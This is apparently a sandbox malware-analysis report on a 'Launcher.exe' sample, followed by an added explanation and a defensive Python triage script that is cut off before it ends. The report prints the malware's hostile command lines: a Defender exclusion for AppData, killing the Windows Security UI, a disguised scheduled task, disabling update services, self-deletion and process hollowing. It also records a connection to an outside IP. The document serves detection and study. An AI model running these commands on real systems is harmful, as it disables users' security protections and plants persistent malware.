                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PortConnector
                      Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe System information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe System information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe System information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe API/Special instruction interceptor: Address: 7FFCC372D044
                      Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 7FFCC372D044
                      Source: C:\Windows\SysWOW64\svchost.exe API/Special instruction interceptor: Address: 571B83A
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe Memory allocated: E30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe Memory allocated: 1AB70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe Memory allocated: 13E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe Memory allocated: 1AE50000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3491
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 425
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6710
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2908
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7960
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1728
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Window / User API: threadDelayed 4242
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3904
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3066
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2868
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1358
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2891
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 908
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1832 Thread sleep count: 3491 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1832 Thread sleep count: 425 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 60 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712 Thread sleep count: 6710 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712 Thread sleep count: 2908 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep count: 7960 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356 Thread sleep count: 1728 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 576 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe TID: 2296 Thread sleep time: -210000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe TID: 4992 Thread sleep count: 4242 > 30
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe TID: 1712 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428 Thread sleep count: 3904 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 576 Thread sleep count: 178 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6060 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2592 Thread sleep count: 3066 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6116 Thread sleep count: 89 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836 Thread sleep count: 2868 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4020 Thread sleep count: 1358 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2716 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\timeout.exe TID: 3756 Thread sleep count: 35 > 30
                      Source: C:\Windows\System32\timeout.exe TID: 2504 Thread sleep count: 36 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5048 Thread sleep count: 2891 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912 Thread sleep count: 908 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4736 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\SysWOW64\svchost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 28_2_0021FCDE FindFirstFileExW,28_2_0021FCDE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 28_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0021FD8F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 29_2_0021FCDE FindFirstFileExW,29_2_0021FCDE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 29_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0021FD8F
                      Source: svchost.exe, 00000005.00000002.2498813732.000001617CE64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
                      Source: svchost.exe, 00000005.00000002.2498074264.000001617CE4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: svchost.exe, 00000005.00000002.2497642543.000001617CE27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000005.00000002.2498813732.000001617CE81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000005.00000002.2497642543.000001617CE27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}a
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1598928091.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384299612.0000000001548000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000005.00000002.2496518052.000001617CE02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: svchost.exe, 00000005.00000002.2499410666.000001617CF02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000005.00000002.2498074264.000001617CE4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe API call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 28_2_001A553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,28_2_001A553B
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 28_2_0020DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0020DC9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 28_2_002361B4 mov edi, dword ptr fs:[00000030h] 28_2_002361B4
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe Code function: 30_3_00930277 mov eax, dword ptr fs:[00000030h] 30_3_00930277
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe Code function: 30_2_00930277 mov eax, dword ptr fs:[00000030h] 30_2_00930277
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Code function: 28_2_0021B71C GetProcessHeap,28_2_0021B71C
                      Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0020D8E2
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DC92 SetUnhandledExceptionFilter,28_2_0020DC92
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0020DC9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_00215DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00215DCE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0020D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0020D8E2
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0020DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0020DC9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00215DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00215DCE
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.236.26.111 5968
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002361B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Memory written: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Thread register set: 4284 501
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe C:\Users\user\AppData\Local\wxymrnibweqciwn.exe
Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net session
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Process created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe"
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6972 -s 136
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
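The findings above describe one evasion chain: Launcher.exe excludes the whole AppData tree from Defender (Add-MpPreference -ExclusionPath), kills the Windows Security UI, the dropped qzemwxiuzucyxcx.exe registers a minute-interval scheduled task named like an Edge updater but pointing into AppData\Roaming and then deletes itself, wxymrnibweqciwn.exe spawns svchost.exe from a user directory, niyrycbicwuyiuc.exe disables the update and BITS services, and xzuucncwbxucqic.exe shows the classic RunPE call order (CreateProcessW, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread) together with an MZ header written at base 0x400000. The script below is an added example, not code from the Joe Sandbox report or from the malware: it parses constructed copies of these report lines (some command lines shortened) and tags each with a technique label. The labels, the user-writable directory list, the system-process name list and the regexes are this example's own assumptions, not Joe Sandbox signature names, and the parser accepts both the report's glued "...exeProcess created:" layout and a " | " separated layout.

```python
"""Triage of Joe Sandbox style behaviour lines (added example, not report code).

Parses 'Process created:' and 'Code function:' findings and tags them with a
technique label. Labels, regexes and directory lists are this example's own
assumptions, not Joe Sandbox signature names.
"""
import re

# Constructed from the commands shown in this report; some command lines are
# shortened. One line keeps the report's glued "...exeProcess created:" form.
SAMPLE_LINES = [
    r'''Source: C:\Users\user\Desktop\Launcher.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""''',
    r'''Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe''',
    r'''Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"''',
    r'''Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"''',
    r'''Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"''',
    r'''Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\"); foreach ($svc in $services) { stop-service $svc -force; set-service $svc -startuptype disabled; }"''',
    r'''Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist''',
    r'''Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_002361B4 GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,28_2_002361B4''',
]

PROC_RE = re.compile(
    r"Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<child>\S+)\s*(?P<cmd>.*)"
)
FUNC_RE = re.compile(r"Code function:\s*(?P<fid>\S+)\s+(?P<apis>[\w,]+)")

# RunPE / process hollowing: stages must occur in this order. The Wow64
# variants are what a 32-bit injector uses against a 32-bit child on x64.
HOLLOW_CHAIN = [
    {"CreateProcessW", "CreateProcessA"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"WriteProcessMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread"},
]
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
SYSTEM_NAMES = {"svchost.exe", "fontdrvhost.exe", "dllhost.exe", "rundll32.exe"}


def hollowing_chain_present(apis):
    """True if the hollowing stages appear as an ordered subsequence of the API list."""
    stage = 0
    for api in apis:
        if stage < len(HOLLOW_CHAIN) and api in HOLLOW_CHAIN[stage]:
            stage += 1
    return stage == len(HOLLOW_CHAIN)


def classify_command(parent, child, cmd):
    """Return technique tags for one process-creation finding (empty if nothing matched)."""
    low = cmd.lower()
    tags = []
    if "add-mppreference" in low and "-exclusionpath" in low:
        tags.append("defender-exclusion")
    if "set-service" in low and "-startuptype disabled" in low:
        tags.append("service-tampering")
    if "taskkill" in low and "sechealthui" in low:
        tags.append("kill-security-ui")
    m = re.search(r'schtasks\s+/create.*?/sc\s+(\w+).*?/tr\s+"([^"]+)"', low)
    if m and any(d in m.group(2) for d in USER_WRITABLE):
        # Short-interval task whose action lives in a user-writable directory.
        tags.append("scheduled-task-persistence(%s)" % m.group(1))
    if re.search(r"\btimeout\b.*&&\s*del\b", low):
        tags.append("self-delete")
    child_name = child.lower().rsplit("\\", 1)[-1]
    if child_name in SYSTEM_NAMES and any(d in parent.lower() for d in USER_WRITABLE):
        tags.append("system-process-spawned-from-user-dir")
    return tags


def triage(lines):
    """Map technique tag -> child paths (or function ids) that triggered it."""
    hits = {}
    for line in lines:
        f = FUNC_RE.search(line)
        if f:
            # The trailing field repeats the function id; drop anything numeric.
            apis = [a for a in f.group("apis").split(",") if a and not a[0].isdigit()]
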